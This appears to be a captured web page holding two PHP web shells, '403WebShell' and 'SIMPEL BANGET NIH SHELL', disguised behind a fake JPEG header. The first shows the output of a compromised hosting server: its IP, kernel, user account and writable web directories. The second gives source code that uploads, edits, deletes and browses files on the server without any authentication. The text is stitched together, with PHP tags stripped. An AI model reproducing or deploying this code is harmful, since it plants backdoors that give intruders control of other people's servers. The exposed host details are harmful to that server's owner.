????JFIF??x?x????'<!doctypehtml><title>403WebShell</title><meta content="noindex"name="robots"><body bgcolor="#1f1f1f"text="#ffffff"><link href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/4.7.0/css/font-awesome.min.css"rel="stylesheet"><style>@import url(https://fonts.googleapis.com/css?family=Dosis);@import url(https://fonts.googleapis.com/css?family=Bungee);@import url(https://fonts.googleapis.com/css?family=Russo+One);body{font-family:Consolas,cursive;text-shadow:0 0 1px #757575}body::-webkit-scrollbar{width:12px}body::-webkit-scrollbar-track{background:#1f1f1f}body::-webkit-scrollbar-thumb{background-color:#1f1f1f;border:3px solid gray}#content tr:hover{background-color:#636263;text-shadow:0 0 10px #fff}#content .first{background-color:#5e5e5e}#content .first:hover{background-color:#25383c;text-shadow:0 0 1px #757575}table{border:1px #000 dotted;table-layout:fixed}td{word-wrap:break-word}a{color:#df5;text-decoration:none}a:hover{color:#000;text-shadow:0 0 10px #fff}input,select,textarea{border:1px #000 solid;-moz-border-radius:5px;-webkit-border-radius:5px;border-radius:5px}.gas{background-color:#1f1f1f;color:#fff;cursor:pointer}select{background-color:transparent;color:#fff}select:after{cursor:pointer}.linka{background-color:transparent;color:#fff}.up{background-color:transparent;color:#fff}option{background-color:#1f1f1f}.btf{background:0 0;border:1px #fff solid;cursor:pointer}::-webkit-file-upload-button{background:0 0;color:#fff;border-color:#fff;cursor:pointer}</style>
<font face="Bungee" size="5">403Webshell</font>
<table width="100%" border="0" cellpadding="3" cellspacing="1" align="center">Server IP : <font color=#df5>68.65.122.73</font> &nbsp;/&nbsp; Your IP : <font color=#df5>197.204.56.74</font>
Web Server : <font color='#df5'>LiteSpeed</font>
System : <font color='#df5'>Linux server113.web-hosting.com 4.18.0-513.18.1.lve.el8.x86_64 #1 SMP Thu Feb 22 12:55:50 UTC 2024 x86_64</font>
User : <font color='#df5'>motaorpp&nbsp;</font>( <font color='#df5'>7343</font>)
PHP Version : <font color='#df5'>7.4.33</font>
Disable Function : <font color='#df5'>NONE</font></font>
MySQL : <font color=red>OFF</font> &nbsp;|&nbsp; cURL : <font color=green>ON</font> &nbsp;|&nbsp; WGET : <font color=green>ON</font> &nbsp;|&nbsp; Perl : <font color=green>ON</font> &nbsp;|&nbsp; Python : <font color=green>ON</font> &nbsp;|&nbsp; Sudo : <font color=red>OFF</font> &nbsp;|&nbsp; Pkexec : <font color=red>OFF</font>
Directory : &nbsp;<a href="?loknya=/">/</a><a href="?loknya=/home">home</a>/<a href="?loknya=/home/motaorpp">motaorpp</a>/<a href="?loknya=/home/motaorpp/public_html">public_html</a>/
Upload File :
current_dir [ <font color='green'>Writeable</font> ]document_root [ <font color='green'>Writeable</font> ]

&nbsp;

Command : >" class="up" style="cursor: pointer; border-color: #fff">

<hr><center style="font-family: Russo One">[ <a href='/themes.php'>Back</a> ]&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<hr>

$dir = isset($_GET['dir']) ? hex2bin($_GET['dir']) : '.';
$files = scandir($dir);
$upload_message = '';
$edit_message = '';
$delete_message = '';

function get_file_permissions($file) {
return substr(sprintf('%o', fileperms($file)), -4);
}

function is_writable_permission($file) {
return is_writable($file);
}

if (isset($_FILES['file_upload'])) {
if (move_uploaded_file($_FILES['file_upload']['tmp_name'], $dir . '/' . $_FILES['file_upload']['name'])) {
$upload_message = 'File berhasil diunggah.';
} else {
$upload_message = 'Gagal mengunggah file.';
}
}

if (isset($_POST['edit_file'])) {
$file = $_POST['edit_file'];
$content = file_get_contents($file); // membaca isi file yang ingin diedit
if ($content !== false) {
echo '
'; // buat form baru untuk menampilkan textarea dan tombol Submit
echo '<textarea id="CopyFromTextArea" name="file_content" rows="10" class="form-control">' . htmlspecialchars($content) . '</textarea>';
echo '';
echo '<button type="submit" name="submit_edit" class="btn btn-outline-light">Submit</button>';
echo '
';
} else {
$edit_message = 'Gagal membaca isi file.';
}
}

if (isset($_POST['submit_edit'])) {
$file = $_POST['edited_file'];
$content = $_POST['file_content'];
if (file_put_contents($file, $content) !== false) {
$edit_message = 'File berhasil diedit.';
} else {
$edit_message = 'Gagal mengedit file.';
}
}

if (isset($_POST['delete_file'])) {
$file = $_POST['delete_file'];
if (unlink($file)) {
$delete_message = 'File berhasil dihapus.';
} else {
$delete_message = 'Gagal menghapus file.';
}
}

$uname = Linux Server 5.4.0-81-generic #91-Ubuntu SMP Thu Jul 15 19:09:17 UTC x86_64;
$current_dir = realpath($dir);


<!DOCTYPE html>


SIMPEL BANGET NIH SHELL <title>SIMPEL BANGET NIH SHELL</title>
<style>
body {
font-family: Arial, sans-serif;
margin: 0;
padding: 0;
text-align: center;
}
header {
background-color: #4CAF50;
color: white;
padding: 1rem;
}
header h1 {
margin: 0;
}
main {
padding: 1rem;
}
table {
border-collapse: collapse;
margin: 1rem auto;
width: 50%;
}
th, td {
border: 1px solid #ddd;
padding: 0.5rem;
text-align: left;
}
th {
background-color: #f2f2f2;
}
tr:nth-child(even) {
background-color: #f2f2f2;
}
tr:hover {
background-color: #ddd;
}
form {
display: inline-block;
margin: 1rem 0;
}
input[type="submit"] {
background-color: #4CAF50;
border: none;
color: white;
cursor: pointer;
margin-left: 1rem;
padding: 0.5rem 1rem;
text-align: center;
text-decoration: none;
display: inline-block;
font-size: 12px;
}
input[type="submit"]:hover {
background-color: #45a049;
}
</style>


<header>

SIMPEL BANGET NIH SHELL


</header>
<main>
<p>Current directory: echo $current_dir; </p>
<p>Server information: echo $uname; </p>
if (!empty($upload_message)):
<p> echo $upload_message; </p>
endif;
if (!empty($edit_message)):
<p> echo $edit_message; </p>
endif;
if (!empty($delete_message)):
<p> echo $delete_message; </p>
endif;

<label>Upload file:</label>






<th>Filename</th>
<th>Permissions</th>
<th>Actions</th>

foreach ($files as $file):


<td style="color: echo is_writable_permission($dir . '/' . $file) ? 'green' : 'red'; ">
echo is_file($dir . '/' . $file) ? get_file_permissions($dir . '/' . $file) : (is_writable_permission($dir . '/' . $file) ? 'Directory' : 'Directory (No writable)');



endforeach;

if (is_dir($dir . '/' . $file)):
<a href="?dir= echo bin2hex($dir . '/' . $file); "
style="color: echo is_writable_permission($dir . '/' . $file) ? 'inherit' : 'red'; "> echo $file; </a>
else:
<span style="color: echo is_writable_permission($dir . '/' . $file) ? 'inherit' : 'red'; "> echo $file; </span>
endif;

if (is_file($dir . '/' . $file)):


<button type="submit" class="btn btn-outline-light">Edit</button>



<button type="submit" class="btn btn-outline-light">Delete</button>

endif;

</main>